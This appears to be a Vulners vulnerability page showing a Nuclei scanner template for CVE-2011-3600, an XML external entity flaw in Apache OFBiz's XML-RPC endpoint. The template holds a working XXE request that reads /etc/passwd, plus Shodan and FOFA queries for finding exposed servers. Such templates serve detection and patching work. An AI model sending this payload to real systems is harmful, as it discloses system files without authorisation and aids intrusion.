Vulners
Lucene search
Apache OFBiz - XML External Entity Injection
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2011-3600 | 26 Nov 201908:57 | – | circl |
 | Apache OFBiz XML-RPC event handler code issue vulnerability | 25 Nov 201900:00 | – | cnvd |
 | CVE-2011-3600 | 26 Nov 201900:07 | – | cve |
 | CVE-2011-3600 | 26 Nov 201900:07 | – | cvelist |
 | CVE-2011-3600 | 26 Nov 201900:07 | – | debiancve |
 | EUVD-2011-3559 | 7 Oct 202500:30 | – | euvd |
 | CVE-2011-3600 | 26 Nov 201901:15 | – | nvd |
 | CVE-2011-3600 | 26 Nov 201901:15 | – | osv |
 | Xxe | 26 Nov 201901:15 | – | prion |
 | PT-2019-6676 · Apache · Ofbiz | 26 Nov 201900:00 | – | ptsecurity |
10
id: CVE-2011-3600
info:
name: Apache OFBiz - XML External Entity Injection
author: daffainfo,pikpikcu
severity: high
description: |
The /webtools/control/xmlrpc endpoint in OFBiz XML-RPC event handler is exposed to External Entity Injection by passing DOCTYPE declarations with executable payloads that discloses the contents of files in the filesystem. In addition, it can also be used to probe for open network ports, and figure out from returned error messages whether a file exists or not. This affects OFBiz 16.11.01 to 16.11.04.
impact: |
Attackers can disclose sensitive filesystem data, probe network ports, and determine file existence, leading to information disclosure and potential further exploitation.
remediation: |
Update to the latest OFBiz version or apply security patches addressing XML external entity vulnerabilities.
reference:
- https://lists.apache.org/thread/cwz2v0b6pnxvqrnsd0hj3l80g9qq5kd8
- https://nvd.nist.gov/vuln/detail/CVE-2011-3600
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2011-3600
cwe-id: CWE-611
epss-score: 0.1591
epss-percentile: 0.96471
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: ofbiz
shodan-query:
- http.html:"ofbiz"
- ofbiz.visitor=
fofa-query:
- body="ofbiz"
- app="apache_ofbiz"
tags: cve,cve2011,apache,ofbiz,xxe,vuln,vkev
http:
- raw:
- |
POST /webtools/control/xmlrpc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file:////etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "faultString"
condition: and
- type: status
status:
- 200
# digest: 490a00463044022041f4ed7f475516fa0655fce9f2c15d3b21befe26f3307187ca80b957b6d1b02602202ad7590e6fc0111ae3f875f01a40bd9bce6edae5eeda5a55ff5af3ae1d55ad76:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.1591